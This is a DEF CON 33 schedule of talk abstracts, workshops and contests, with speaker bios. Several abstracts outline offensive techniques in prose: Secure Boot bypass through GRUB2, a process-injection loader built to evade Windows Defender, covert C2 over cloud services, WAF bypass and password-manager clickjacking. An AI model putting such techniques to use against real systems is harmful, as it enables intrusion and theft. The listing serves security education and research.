Matt Olmsted has worked professionally in software engineering for over a decade, and been interested in infosec his entire career. In 2024 he decided to go for the CISSP as his first infosec cert and passed the exam at the minimum number of questions after only studying two weeks. He's something of a polymath and renaissance man, the latter in both a literal and figurative sense.
- ics Calendar file
Open-source security is facing an existential crisis. From the xz backdoor to Log4Shell and even vulnerabilities in ncurses, we are witnessing a recurring pattern: widely used but poorly scrutinized components becoming critical attack vectors. GRUB2 is no exception.
In this talk, I will present a deep dive into several vulnerabilities I discovered in GRUB2's major filesystem drivers—exploitable flaws in one of the most privileged and security-critical pieces of software in the modern boot chain. Despite its role in Secure Boot, GRUB2 lacks fundamental OS security mechanisms (no ASLR, no modern exploit mitigations) and processes a large volume of untrusted input—violating Google's ""Rule of 2"" security principle.
We'll begin with an overview of UEFI and Secure Boot, demonstrating how GRUB2 fits into the ecosystem and why it remains an attractive target for attackers. I will then detail my findings, showcasing how an attacker can exploit these flaws to subvert Secure Boot entirely. Through a practical demonstration, we will explore the implications of these vulnerabilities—turning a standard bootloader attack into a full-blown compromise of system integrity.
Additionally, I will be describing my journey into discovering similar vulnerabilities other bootloaders such as U-boot and Barebox.
Finally, we will discuss the broader security implications, including the urgent need for stronger security practices in open-source bootloaders and what steps can be taken to prevent the next major supply chain disaster.
This talk will be essential for security researchers, enterprise defenders, and anyone relying on Secure Boot for protection. If you thought your bootloader was secure—think again.
Note: DCGVR Talks are scheduled 1 hour slots, but the actual presentations can be as short as 30 minutes. Please arrive at the start of the hour.
SpeakerBio: Jonathan "JBO" Bar OrJonathan Bar Or ("JBO") is an information security expert and a hacker, focusing on binary analysis, vulnerability research, application security, reverse engineering, and cryptography.
His research has uncovered critical vulnerabilities that have impacted millions of users worldwide, shaping security best practices across the industry. Frequently cited by major news outlets, his work has influenced both academia and industry, driving meaningful security improvements.
He is also a seasoned public speaker, presenting at top security conferences and sharing deep technical insights on exploitation techniques, mitigations, and emerging threats.
- ics Calendar file
This workshop demonstrates how SS7 signaling can be intercepted and manipulated to retrieve a mobile user's location without user interaction using custom-developed malware. Additionally, it demonstrates how the GTPdoor malware creates a hidden backdoor by abusing GTP signaling in roaming networks.
SpeakerBio: Nadeem Bagwan
- ics Calendar file
Malicious packages have grown 156% YoY for supply chain security and supply chain attacks cost organizations $41 billion in 2023 (projected to reach $81 billion by 2026). This session underscores the urgent need to re-examine our defensive postures for software supply chain security by taking an offensive security perspective.
Our talk explains the offensive security methods in the software supply chain, exploring how attackers can compromise entire organizations by targeting each layer of the supply chain.
We define the attack surface, which spans the source, build, and distribution phases, and then showcase advanced techniques used to exploit these components. Drawing on our in-depth research, we demonstrate real-world exploits including supply chain hacks that backdoor hidden dependency links resulting in financial gain for attackers and harm to millions of companies.
Attendees will learn not only how these vulnerabilities are discovered and exploited but also how to apply offensive insights to reinforce their security practices.
Speakers:Roni "lupin" Carta,Adnan KhanRoni Carta, known as Lupin and co-founder of Lupin & Holmes, is an ethical hacker specializing in offensive cybersecurity, with a strong background in bug bounty hunting, including a $50,000 reward for hacking Google AI, red teaming at ManoMano, and significant research into software supply chain vulnerabilities, notably presenting at DEF CON 32 and recently reporting a hack of Google's AI Gemini; his diverse technical skills range from ATO and RCE exploits to supply chain security, earning him recognition in various cybersecurity competitions.
SpeakerBio: Adnan Khan, AWS
- ics Calendar file
Think you know what your GitHub Actions are doing? Think again. This talk breaks down GitHub Actions security risks, exposes real-world exploits, and reveals hidden threats. We’ll compare existing security tools and introduce a new one to help secure workflows and detect vulnerabilities.
Speakers:Iggy,Michael Goberman,Sharon Ohayon PshoulI'm Igor Stepansky, a Product Security Engineer at Axonius for more than 3 years with a background as a cybersecurity analyst. My expertise includes integrating security solutions such as SAST, IaC, SCA, secrets detection, malicious package identification, and more. I'm also responsible for penetration testing, securing cloud and Docker environments, GitHub hardening, and building cool tools to enhance security workflows. I'm passionate about sharing practical knowledge and insights gained from working with diverse security solutions in a modern enterprise environment like Axonius.
SpeakerBio: Michael GobermanI’m a security architect and team leader at Axonius, and a board member of the OWASP Israel chapter. I lead cross-functional security initiatives and support teams in building secure, scalable systems. Before stepping into architecture, I spent seven years in hands-on penetration testing, which gave me a strong foundation in understanding how real-world threats work—and how to approach them effectively. I’m passionate about bridging the gap between security and development, making security more approachable, and creating space for curiosity, collaboration, and continuous learning.
- ics Calendar file
In this hands-on 2-hour workshop, we will explore the fascinating and evolving world of Web Application Firewall (WAF) bypassing—a critical topic for penetration testers, red teamers, and security engineers.
Participants will be introduced to the fundamentals of WAFs, including how modern systems detect and block potentially malicious requests. We’ll then dive into a range of realistic evasion techniques used to sneak past WAF protections and interact with protected applications.
SpeakerBio: Felipe Zipitria, OWASP CRS, ModSecurity & Coraza projects at OWASP
- ics Calendar file
Bricks in the Air is a hands-on demo to teach the basics of low level protocols seen in aviation. The demo uses the I2C protocol and does not reveal actual security vulnerabilities in avionics or other systems in aviation.
- ics Calendar file
Browser extensions have become increasingly popular for enhancing the web browsing experience. Common examples are ad blockers, cryptocurrency wallets, and password managers. At the same time, modern websites frequently display intrusive elements, such as cookie consent banners, newsletter subscription modals, login forms, and other elements that require user interaction before the desired content can be displayed.
In this talk, I will present a new technique based on clickjacking principles that targets browser extensions, where I used fake intrusive elements to enforce user interaction. In my research, I tested this technique on the 11 most widely used password managers, which resulted in discovering multiple 0-day vulnerabilities that could affect tens of millions of users. Typically, just one click was required from a user to leak their stored private information, such as credit card details, personal data or login credentials (including TOTP). In some cases, it could lead to the exploitation of passkey authentication.
The described technique is general and can be applied to browser extensions beyond password managers, meaning other extensions may also be vulnerable to this type of attack. In addition to describing several methods of this technique, I will also recommend mitigations for developers to protect their extensions against this vulnerability.
SpeakerBio: Marek TóthMarek Tóth is a security researcher from the Czech Republic specializing in web application security. In his free time, he conducts independent research or reports critical vulnerabilities that could be exploited by attackers, with a recent focus on Czech companies. He shares interesting findings on his personal website, youtube channel or presents them at conferences, primarily at OWASP Chapter meetups.
- ics Calendar file
We will tell the story of our ups and downs competing in the challenge and the lessons we learned along the way and give an overview of the competition, detail how our approach to the competition evolved as the rules and objectives changed, share our key takeaways, and outline what's next for CRS.
SpeakerBio: Michael D. Brown, Principal Security Engineer and Head of AI/ML Security Research at Trail of Bits
- ics Calendar file
This year, for the first time ever, Bug Bounty Village is bringing you a Capture the Flag with a twist. This CTF is designed to feel just like a real bug bounty hunt.
Dive into a vulnerable application and see if you can uncover its hidden weaknesses just like you would on a bug bounty program. The CTF is designed to be accessible for all experience levels, from beginners looking for their first bug to veteran hunters eager for a very interesting challenge. Expect a range of vulnerabilities, from trivial finds to sophisticated ones that will push you to the limit.
But that’s not all. We’re adding a unique real-world flavor to the competition. Participants onsite at DEF CON will submit some of their bug reports for those to be validated by real bug bounty triagers volunteering their expertise to make this experience as real as possible. This process will determine scores based not just on technical prowess but on report quality and professionalism, just like in a bug bounty program.
Get ready for a realistic bug bounty experience, a chance to grow your skills, connect with the community, and show what you’re made of.
Please note that you must be present on-site for our award ceremony on Sunday at 13:00 in order to receive any prizes.
- ics Calendar file
Kit cost $100
- ics Calendar file
- ics Calendar file
Before and at the dawn of the world wide web, the Internet was mostly unencrypted and unprotected. In this talk, I’ll discuss the culture of the pre-WWW Internet, the hardware we used and the security practices. I’ll discuss my experiences from the Internet of the late 1980’s and the early 1990’s up until the introduction of the WWW. I’ll go over experiences with technologies such as 10Base5 Ethernet, telnet, finger, rsh/rlogin/rdist, etc. I will also talk about my experiences working with law enforcement to bust a hacker in one of the first such arrests in Florida history.
SpeakerBio: Richard Rauscher, Head of Technology at University of South Florida Bellini College of Cybersecurity, AI and ComputingRichard Rauscher is the Head of Technology for the University of South Florida Bellini College of Cybersecurity, AI and Computing and an Associate Professor of Computer Science. In previous roles, he was the Executive Vice President of Miva, Inc. in San Deigo, the Director of Research Informatics for Penn State University, the CIO of Karmanos Cancer Institute in Detroit and the first CISO of Moffitt Cancer Center in Tampa. He has a PhD in Computer Science from Penn State and a CISSP certification.
- ics Calendar file
Want to build a Security Champion program that doesn’t fizzle after launch? This 2-hour hands-on workshop will guide you through designing a practical, sustainable champion program tailored to your culture, org structure, and resourcing realities. Whether you’re just getting started or trying to fix a stalled initiative, this session will equip you with the tools to define your vision, shape meaningful goals, and map out your first cohort - all with a firm grounding in culture-building, metrics, and action-oriented design. Participants will work through a collaborative workbook with activities focused on champion behaviors, stakeholder alignment, motivational techniques, and training plans. You'll leave with a solid program blueprint, practical takeaways, and inspiration to rally allies across Engineering, Application Security, and Leadership. If you believe developers are on the front lines of security, and want to do more than "raise awareness," this is your workshop.
Speakers:Tanya "SheHacksPurple" Janca,Stanley HarrisTanya Janca, aka SheHacksPurple, is the best-selling author of 'Alice and Bob Learn Secure Coding', 'Alice and Bob Learn Application Security’ and the ‘AppSec Antics’ card game. Over her 28-year IT career she has won countless awards (including OWASP Lifetime Distinguished Member and Hacker of the Year), spoken all over the planet, and is a prolific blogger. Tanya has trained thousands of software developers and IT security professionals, via her online academies (We Hack Purple and Semgrep Academy), and her live training programs. Having performed counter-terrorism, led security for the 52nd Canadian general election, developed or secured countless applications, Tanya Janca is widely considered an international authority on the security of software. Tanya currently works at Semgrep as a Security Advocate.
SpeakerBio: Stanley Harris, CEO at KaitlystStanley is a start-up founder and organizational culture expert focused on bridging the gap between security and software engineering. At Katilyst, he designs scalable enablement programs that empower developers to lead with security in mind, from threat modeling to vulnerability management. Stanley specializes in building Security Champion programs that don’t just raise awareness, but drive ownership, behavior change, and long-term impact. He’s passionate about demystifying security, making it actionable, and equipping teams to move fast and build securely.
- ics Calendar file
Dr. Pellegrino has over 20 years of research and development experience in information science. He has researched and built systems for the Pentagon, U.S. Department of Homeland Security, U.S. Army, U.S. Navy, DuPont, Dow Chemical, Pfizer, and smaller organizations. His work has received international awards in Visual Analytics and Data Integration. He is an expert in the fields of Natural Language Processing (NLP) and Linked Data, including ontology development. Work done for the U.S. Navy has included support for the CVN 78 and other platforms. In addition, he is a computer programmer and has led Software Engineering projects within large organizations.
- ics Calendar file
Trying to trace an attacker pivoting from AWS to Azure to GCP often feels like building detections in silos while attackers exploit the seams. As detection engineers (DEs), we know the pain: scattered logic, cloud-specific alerts, and a fragmented view. We need to move beyond individual events and reconstruct the cross-cloud kill chain to see the full attack.
This DEF CON Lightning Talk is a practical DE playbook for AWS, Azure, and GCP. No fluff, just 'how-to' for building detections that connect the dots across clouds.
In ~15 minutes, we’ll cover: Cross-Cloud TTPs: How attackers really pivot between AWS, Azure & GCP in 2025 and the patterns they leave. Mapping Logs to Kills: Identifying essential logs (CloudTrail, Azure AD, GCP Audit, etc.) and mapping them to attack stages. Crafting Correlation Rules: Real SIEM examples (Sentinel/Chronicle/etc.) for stitching events together – think 'Azure Risky Login' + 'AWS Role Use' = P1 Alert. Actionable DE Strategies: Threat intel integration, baselining cross-cloud activity, and building high-fidelity alerts. Automation & OCSF: Streamlining ingestion and normalization so you can focus on the hunt. If you write detection rules or hunt threats in a multi-cloud mess, this is for you. You'll leave with actionable TTPs, correlation logic examples, and a clear path to building detections that reveal the entire cross-cloud kill chain. Let's build better traps.
SpeakerBio: Gowthamaraj RajendranGowthamaraj Rajendran is a cybersecurity professional and Threat Detection Engineer at Meta, with over 4 years of experience. For the past 2 years, he has specialized in creating precise and effective detection capabilities.
- ics Calendar file
[Overview]
Malware analysis often focuses on detonation, leaving new defenders and red‑teamers wondering how a loader is actually assembled. In this accelerated, beginner‑friendly, two‑hour hands‑on workshop, participants start with a ready‑to‑build Visual Studio solution and finish with a fully functional Windows 11 process‑injection loader written in C. We focus on the classic three‑call technique: VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread, plus a quick single‑byte XOR obfuscation pass and file bloating operation. All workshop time is devoted to getting a working loader, testing it against Windows Defender, and understanding each step well enough to particpants can expand beyond it.
[Course Outline]
Environment Jump-Start 0.1 Cover Windows 11 snapshot with tools and skeleton code. 0.2 Confirm build of Loader.sln.
Loader Fundamentals 1.1 Loader vs payload overview 1.2 Memory layout and why VirtualAllocEx / WriteProcessMemory / CreateRemoteThread works.
Hands-On Build 2.1 VirtualAllocEx - reserve RWX in target. 2.2 WriteProcessMemory - copy shellcode. 2.3 CreateRemoteThread - execute and watch notepad.exe execute. 2.4 Breakpoint demo in x64dbg.
Evasion 3.1 Wrap shellcode in XOR decoder stub. 3.2 Bloat file with appneded null bytes. 3.3 Show Defender detection before and after.
Wrap-Up and Next Steps 4.1 Provide code branches: indirect-syscalls, AMSI-bypass 4.2 Safe research and legal reminders 4.3 Recommended reading links
Malware developer and vulnerability researcher with a focus on red team tooling. A purveyor of CTFs and watcher of shellcode pop, they enjoy crafting PoCs and designing CTF challenges for the community. Their current research explores Windows malware development, covert communication channels, and fuzzing techniques.
- ics Calendar file
Let’s face it — traditional HTTP C2 is burning out. Between aging domains, TLS cert management, sandbox fingerprinting, and blue teams getting smarter at categorizing traffic and infrastructure, your custom C2 feels less covert and more like a liability. Red teams and threat actors alike are shifting toward living off legitimate services — AWS, GitHub, Box, Notion, whatever blends in — but building solutions that are custom to a single C2 framework? Let’s stop doing that. Let’s share the fun! C4 (Cross-Compatible Command & Control) is here to change that. It’s a modular toolkit of WASM-powered plugins that makes external C2 easy to implement, regardless of your implant's language or target OS. Whether you’re writing in C, Rust, Go, Python, C#, or something else entirely, C4 plugins can be loaded directly into your implant and run on Windows, macOS, or Linux. But the real game-changer? C4 provides a single, centralized collection of over 10 fully-documented, operationally-ready external C2 modules — not just proof-of-concepts, but production-level integrations with trusted sites that fly under the radar. No more hunting through GitHub repos, hand-rolling fragile API calls, or hacking together glue code for every new environment. Stop reinventing external C2 and start planting some C4 in your implants!
SpeakerBio: Scott "ScottCTaylor12" Taylor, Senior Red Team Operator at Sony's Global Threat EmulationScott Taylor is a Senior Red Team Operator on Sony's Global Threat Emulation team. Scott has previously worked at the MITRE Corporation and T. Rowe Price focused on emulating adversary behaviors. While Scott has been a technical professional for a decade, only the second half was focused on offensive security. He started as a Linux system administration intern where he learned to build before later learning to break. Scott leverages his system administration background in his offensive security career where he passionately researches command and control (C2) infrastructure for red team operations. Open-source publications by Scott include custom C2 channels for popular C2 frameworks, leveraging cloud services for C2, and automating red team infrastructure deployment.
- ics Calendar file
Dive into the world of Operational Technology (OT) adversary emulation — no racks of hardware required. With Caldera for OT (C4OT) and our new virtual device simulators, you can explore the inner workings of OT network communications from the comfort of your own home lab. The biggest industrial control systems incidents — FrostyGoop, PIPEDREAM, Industroyer — didn’t rely on flashy zero-days to impact physical systems. Instead, they used native OT protocols to send valid messages with malicious intent. Now, with C4OT, you can step into the attacker’s shoes and explore the quirks and capabilities of protocols like Modbus, DNP3, and IEC61850. No hardware? No problem. No experience? Even better. In this session, we’ll show you how to get started with adversary emulation against simulated OT devices, unlocking a hands-on environment to test your attacks, validate your defenses, and gain practical insights into the world of industrial cybersecurity. Whether you’re a defender looking to understand the threats, a researcher diving into OT protocol behavior, or a red-teamer eager to sharpen your skills, C4OT gives you the tools to experiment safely and effectively. Join us to see how C4OT is revolutionizing adversary emulation for OT — one packet at a time.
Speakers:Devon Colmer,Tony WebberDevon serves as the lead for Caldera for operational technology (OT) within MITRE’s Critical Infrastructure Protection Innovation Center (CIPIC). He specializes in OT adversary emulation and detection engineering, leading the development of OT plugins for MITRE’s Caldera platform. Beyond Caldera, he is researching a common data model for OT protocols to lower the barrier of entry for OT network defenders.
SpeakerBio: Tony WebberTony is the lead for counter measures for operational technology in MITRE’s Critical Infrastructure Protection Innovation Center (CIPIC). His work has spanned systems engineering, solution prototyping, capabilities development, and deployment of cybersecurity and cyber situational awareness solutions for defending industrial control systems. His current focus is adversary emulation for ICS and space systems.
- ics Calendar file
State and local governments (SLTTs), small and medium-sized businesses (SMBs), and nonprofits across the United States are routinely targeted by cyber criminals and nation-states. The societal impacts of those cyber attacks are significant—they force schools to close, hospitals to postpone patient treatment, courts to delay proceedings, and disrupt municipal services.
One way they improve their resilience is by outsourcing some of their information security responsibilities. IT managed service providers (“MSPs”), managed security service providers (“MSSPs”), and other information security service providers can provide a long-term option for high-risk communities to improve their resilience. But not all ITSSPs are created equal - how good are these organizations, really, at protecting small organizations? How affordable are they, and how good are their services?
As part of the Cyber Resilience Corps initiative, Michael Razeeq and Grace Menna interviewed around 20 organizations, including MSPs, MSSPs, IT and cybersecurity consultancies, and their clients, to identify challenges to expanding service provider support to more high-risk communities. This talk will present key findings from their research and policy recommendations to expand service provider coverage across high-risk communities we depend on.
Speakers:Grace Menna,Michael RazeeqGrace Menna is a Public Interest Cybersecurity Fellow at the UC Berkeley Center for Long-Term Cybersecurity (CLTC). In this role, she leads public interest cybersecurity research and oversees the coordination of CLTC and the CyberPeace Institute's newest initiative, the Cyber Resilience Corps, mobilizing cyber volunteering efforts across the US to defend community organizations, including nonprofits, municipalities, rural hospitals and water districts, K-12 schools, and small businesses from cyber threats.
She is an active member of the security research community and helps organize the policy track of DC-based hacker conference, DistrictCon. Previously, Grace supported global cyber capacity-building initiatives at the Atlantic Council's Cyber Statecraft Initiative and, as a consultant, advised U.S. tech companies across policy, intelligence, trust & safety, and other security areas.
SpeakerBio: Michael Razeeq, Non-resident Fellow, Public Interest Cybersecurity, UC Berkeley CLTCMichael Razeeq is a cybersecurity, privacy, and technology law attorney with experience advising and supporting global companies in the media, financial services, and energy sectors, as well as a multinational law firm. Razeeq also serves as an adjunct faculty member at Brooklyn Law School. He is licensed to practice law in New York and Texas, and he holds IAPP CIPP/US, ISACA CISM, and GIAC-GLEG certifications.
Razeeq is also Non-resident Fellow, Public Interest Cybersecurity with UC Berkeley’s Center for Long-Term Cybersecurity (CLTC), where he is researching the ways that service providers can improve cyber resilience for vulnerable organizations and augment the work of civilian cyber corps.
Previously, as a #ShareTheMicInCyber Fellow, Razeeq examined the legal frameworks governing civilian cyber corps established in several U.S. states and in other jurisdictions to identify best practices. Razeeq has published articles about civilian cyber corps in Lawfare and through New America. He has also presented on civilian cyber corps in various forums, including the Rubrik Zero Labs Data Security Decoded podcast, the 2024 New America Future Security Forum, the Caveat podcast from the Cyberwire by N2K Networks, and the 2024 Cyber Civil Defense Summit hosted by the UC Berkeley Center for Long-Term Cybersecurity.
- ics Calendar file
The Call Center Village contest is a community security-challenge that simulates common attack-surfaces found in multi-tenant, multi-industry, BPO call centers - often referred to as "answering services."
Test your skills in physical entry, network security, audio manipulation, messaging protocols, telephony tools, and application security based on our actual experiences working in the call center industry.
As a community, you will work together to break into AnswerTarget - the most modern and secure call-center never built - to unlock physical and digital flags that reveal clues for the Call Center Village social-engineering challenge.
Earn a Call Center Village challenge medal (and your chance at socially-engineering a real-world call center agent) by completing challenges during contest hours!
Prerequisites:
There are no prerequisites or pre-qualifications. We have all the required tools available for you to use, including laptops with a host of standard hacker and voice-related software tools, a flipper zero, a proxmark with writable cards, lock-picks, snap-tools, rubber-duckies, IP phones, headsets, microphones, and more!
- ics Calendar file
Join Call Center Village at Party Line, a carefully-crafted telephony-themed party open to all DEF CON 33 attendees. Help us celebrate the human operators who keep call centers and answering services private, usable, and accessible. Between the illuminated telephone decorations and the sponsor-supplied drink-ticket drops, you're bound to find something to dial up the fun.
- ics Calendar file
Have you ever looked at a tin can, a pile of coax, some solder, a few connectors, and your radio and thought, I’m not sure, but CAN IT HAM? In this new contest for DEF CON 33, the Ham Radio Village is challenging participants to see what they can turn into functioning antennas.
We'll have some basic supplies – tin cans, coax, solder, connectors,– but feel free to bring your own weird components if you want. The 10 best builds will get tested, and the top 3 will score bragging rights & prizes!
Come participate in some radio shenanigans, hack something together and see what you can make work (plus maybe learn something along the way).
Design and build a functioning amateur radio antenna using non-traditional or improvised materials (e.g., tin cans, coat hangers, umbrellas, plumbing pipe).
If it looks absurd and still gets on the air, you're doing it right. HRV will have connectors, soldering stations, and some raw materials for available for use. See what other materials you can find to make the best improvised antenna!
All antennas must be summitted by 10AM on Sunday.
Any antennas not picked up by 2pm on Sunday will be donated to the Ham village or disposed accordingly.
None - Bring your hands and brain and give it a try! You can also bring any* materials from off-site to construct your antenna
no
- ics Calendar file
Come compete in the world’s most challenging cyber defense competition based on the Aries Security Cyber Range. Tear through the challenges, traverse a hostile enterprise class network, and diligently analyze what is found in order to make it out unscathed. Not only glory, but prizes await those that emerge victorious from this upgraded labyrinth, so only the best prepared and battle hardened will escape the crucible.
- ics Calendar file
The Car Hacking Village CTF is a fun interactive challenge which gives contestants first hand experience to interact with automotive technologies. We work with multiple automotive OEMs and suppliers to ensure our challenges give a real-world experience to car hacking. We understand hacking cars can be expensive, so please come check out our village and flex your skills in hacking automotive technologies.
https://www.carhackingvillage.com/ctf-rules
No, contest is in person only.
- ics Calendar file
- ics Calendar file
On Day 2 of DEFCON, bring your resume for a comprehensive review by industry professionals. Get personalized feedback and tips to enhance your resume, making it stand out to potential employers in the cybersecurity field.
Speakers:Ruchira Pokhriyal,Harini RamprasadRuchira is currenty working as a Senior Threat Detection and Response Engineer at Lending Club.
SpeakerBio: Harini Ramprasad, Security Engineer at SnapHarini is currently wokring as Security Engineer at Snap.
- ics Calendar file
In March 2025, a critical supply chain attack struck the popular GitHub Action tj-actions/changed-files, used by more than 23,000 repositories. The attacker slipped in a malicious version that silently exfiltrated CI/CD secrets by printing them to workflow logs—everything from Personal Access Tokens to private SSH keys was suddenly at risk. This incident (CVE-2025-30066) revealed just how easy it is for a trusted third-party action to turn into a threat vector, especially when security controls around CI/CD workflows are lacking.
We built Flowlyt as a static analysis and policy-as-code tool that scans GitHub Actions workflows for signs of malicious behavior, hardcoded secrets, and insecure patterns. With support for Open Policy Agent (OPA), it lets security teams define and enforce custom rules that align with their CI/CD security standards.
Speakers:Arif,HK,Nandan Gupta,kvprashantSenior Security Engineer with 5+ years of experience helping companies build and ship secure products without slowing down innovation. I specialize in Web, API, and Mobile Pentesting, Cloud Security, Threat Modeling, and embedding scalable SSDLC practices. My security journey began with curiosity and evolved into real-world impact—during an audit, I uncovered a critical flaw that could’ve exposed sensitive internal data. At Poshmark, I’ve led third-party library risk assessments, performed architecture reviews for key features, and rolled out secure coding practices across engineering. My threat modeling work improved early risk detection by 40%. Outside of work, I run hands-on security workshops, organize CTFs, and speak at conferences like c0c0n and Seasides. I'm open to the chance to solve real-world security challenges. Let’s connect and build secure systems that scale.
SpeakerBio: HKHare Krishna Rai is a passionate cybersecurity professional with experience in software supply chain security. Currently serving as a Product Security Engineer at a fintech company, they also co-contribute to the SCAGoat open-source project. With over three years of experience in software supply chain security, their expertise spans code review, penetration testing, and GenAI LLM penetration testing.
Hare is an active speaker, having presented at prestigious events such as DEF CON Demolabs, AppSec Village Arsenal, Black Hat, c0c0n, and Null Hyderabad. Beyond their professional pursuits, they enjoy listening to music, watching sci-fi movies, and reading books for personal growth. Always eager to take on new challenges, Hare is committed to advancing their career in cybersecurity and contributing to the broader infosec community.
SpeakerBio: Nandan GuptaNandan Gupta is an Application Security Engineer with a strong passion for cybersecurity. He focuses on penetration testing, secure code reviews, and threat modeling to identify and mitigate vulnerabilities early in the development lifecycle.
SpeakerBio: kvprashantPrashant Venkatesh is an information security expert with over 20 years of experience. He presently works as a Product security Leader
Prashant is an enthusiastic participant in the field who consistently coordinates, reviews papers, and presents his work at numerous InfoSec conferences, including at Nullcon and c0c0n. He is also active through the OWASP Bay Area chapter Leadership and he is co-founder of annual Seasides Conference.
- ics Calendar file
Ever wondered what happens after you hit "submit" on a bug bounty report? At T-Mobile, each submission kicks off a behind-the-scenes journey that spans teams, tools, and time zones. In this talk, we’ll walk through the lifecycle of a bug bounty submission—from Bugcrowd’s triage desk to our internal security workflows—and show why not every finding is considered equal from a business risk perspective.
We'll demystify our internal process: how we prioritize, validate, assign ownership, and resolve reports. You'll see what makes a report fast-tracked to payout—and what gets politely declined. Backed by stats, we’ll reveal how many submissions we get, how many are duplicates or out of scope, and how we determine true impact.
Expect real war stories: from late-night calls and team escalations to reports that sent us scrambling. We'll also lighten the mood with a few “creative” submissions that didn’t quite hit the mark.
Most importantly, we’ll share submission tips drawn from common pain points—what helps us help you, and how high-quality reports earn faster turnarounds, higher payouts, and opportunities like private programs, CVEs, and Bug Bashes.
Whether you're a seasoned hunter or just starting out, this session will give you an honest, inside look at how BBPs work from our end—and how you can maximize your success.
SpeakerBio: Elisa Gangemi, Senior Cybersecurity Engineer at T-MobileElisa Gangemi is a Senior Cybersecurity Engineer on the OffSec Team at T-Mobile, where they manage the Penetration Testing Pipeline and contribute to the company’s Bug Bounty Program. With prior experience in offensive and product security at startups, Elisa helped launch vulnerability management programs, including bug bounty initiatives and security tooling. They began their technology career as a QA tester, then transitioned into InfoSec at Akamai Technologies, working on technical program management and security research. Elisa holds the GIAC GWAPT certification and serves on the GIAC Advisory Board. They’ve enjoyed learning hacking techniques and have participated in a U.S. team that twice placed in the top four at NorthSec’s CTF in Montreal. DEF CON 33 marks their first year attending and speaking.
- ics Calendar file
The phrase “national security impacts of offensive cyber in the healthcare sector” typically brings to mind images of destructive, obvious attacks on hospitals. It should also bring to mind the covert theft of vast troves of biological data. The PRC has a well established policy of stealing intellectual property as a path to development using tactics which have come, in recent years, to prominently feature hacking. The theft of US and allied biological data is crucial to our personal privacy, civil liberties, and national security and we must understand what data is most likely to be targeted in order to best defend it. In sectors other than biotechnology, PRC state-sponsored hacking often focuses on areas identified for development in major planning documents and areas to which the PRC party-state is already devoting significant financial resources to research. For this reason, it is useful to understand the intersection of PRC targeted areas for growth and development and areas in which stealing US sources of data is the easiest and most easily applicable to emerging biotechnology sectors. This talk identifies those sectors and discusses potential consequences.
SpeakerBio: Amelia ShapiroAmelia is an intelligence analyst at Margin Research where she specializing in combining science and technology and regional expertise. Before working at Margin, Amelia worked at a DC-based research shop. Amelia graduated from Brown University with the Albert A. Bennett Prize for Exceptional Accomplishment in the Mathematics Concentration as well as honors in the security studies concentration.
- ics Calendar file
Adversary adventure is a story-scenario based, interactive, cyber war-gaming, choose-your-own adventure model interactive game. This is a gamified version of table-top exercises which is presented to the participants as they can choose to play as an attacker, post exploitation OR a Defender who is defending against an attacker group-threat actor OR even play as a CISO who is dealing with an adversarial situation such as a ransomware incident.
- ics Calendar file
Over the past few months, we've thrown Claude into the digital trenches of multiple cybersecurity competitions—from defending vulnerable networks at CCDC to cracking challenges in PicoCTF and HackTheBox. In this talk, I'll take you through our journey deploying an AI assistant against human red teams and live CTF challenges. I'll show you Claude's unexpected wins (landing in the top 3% globally in PicoCTF and successfully fending off red team attacks at CCDC) alongside its entertaining fails (devolving into security philosophy when overwhelmed, making up flags for PlaidCTF when stuck).
Drawing on these results, I'll break down the technical challenges we conquered, from building specialized tooling harnesses to keeping Claude coherent during 16+ hour competitions. This presentation will demonstrate how competitive environments reveal both the impressive capabilities and amusing limitations of today's AI systems when operating in adversarial scenarios. Join me to see what happens when an assistant trained to be helpful gets dropped into the dynamic world of CTFs and defense competitions—and what this teaches us about AI's true potential in cybersecurity.
References:
SpeakerBio: Keane Lucas, Member of Technical Staff at AnthropicKeane is a researcher on Anthropic's Frontier Red Team focused on stress-testing AI model cybersecurity capabilities. Before joining Anthropic, Keane served as a Cyberspace Operations Officer in the US Air Force and earned his PhD at Carnegie Mellon, where his research focused on applying machine learning to malware detection.
- ics Calendar file
Apache Kafka is an open-source distributed event streaming platform. At the heart of Kafka lies the Broker, which acts as the central server node in a Kafka cluster. Brokers are responsible for storing streams of data and managing the flow of messages between producers and consumers. The Kafka Server we often refer to is essentially the Kafka Broker.
While Kafka’s main system handles data streams well, its real strength comes from its growing ecosystem. The components in the ecosystem greatly expands its abilities: Confluent ksqlDB transforms raw streams into queryable tables for real-time analytics; Schema Registry standardizes data formats across microservices, and so on.
However, behind the rich components lie hidden security threats. Prior research has revealed Remote Code Execution (RCE) vulnerabilities in Kafka Client, yet notably absent were any exploitable RCE vulnerabilities in the Kafka Server — until now. In this work, we present the first-ever RCE vulnerability affecting Kafka Server itself. At the same time, we also used similar techniques to attack other components in the Kafka ecosystem. And these vulnerabilities can also affect the cloud service providers themselves. What's more, Since Kafka users remain unaware of this risk, thousands of Kafka servers are now exposed to this RCE vulnerability.
Speakers:Ji'an "azraelxuemo" Zhou,Ying Zhu,ZiYang "lz2y" LiJi'an Zhou is a Security Engineer in Alibaba Cloud. He is focusing on Java security and cloud native security and his work helped many high-profile vendors improve their products' security, including Google, Amazon, Cloudera, IBM, Microsoft, Oracle. He has previously spoken at Black Hat , Zer0Con, Off-by-One Con.
SpeakerBio: Ying ZhuYing Zhu is a Security Engineer in Alibaba Cloud. He is interested in Web application security, especially Java application security. He has reported many critical vulnerabilities to Amazon, Apache, Cloudera, Microsoft, etc.
SpeakerBio: ZiYang "lz2y" LiZiyang Li is a Security Engineer in Alibaba Cloud. He is focused on Java security and security products. He has reported many critical vulnerabilities to Amazon, Apache, Cloudera, Microsoft, etc.
- ics Calendar file
We ran a research study at Brigham Young University where we tested a novel phishing technique where AI voice cloning is used to imitate specific people. This talk will discuss the results of the study and potential safeguards to prevent these phishing scams.
SpeakerBio: Katherine Rackliffe, Brigham Young UniversityKatherine recently graduated in the cybersecurity program at Brigham Young University, and an incoming PhD student for the University of Wisconsin-Madison.
- ics Calendar file
CTF Starts - 10AM, 8th August.
CTF Ends - 23:59, 9th August.
- ics Calendar file
CMD+CTRL is an immersive learning and hacking platform where developers, security professionals, and tech enthusiasts come together to sharpen their skills in web application security. Players compete in a real-world environment, uncovering vulnerabilities and learning security techniques hands-on. With real-time scoring, the experience stays engaging, fostering both collaboration and friendly competition.
At DEF CON 33 come try out some of our classic Cyber Ranges in a casual, non-competitive environment. Learn about web application security and hack into anything from a healthcare platform to an e-commerce site!
Computer with internet access.
No pre-qualification.
- ics Calendar file
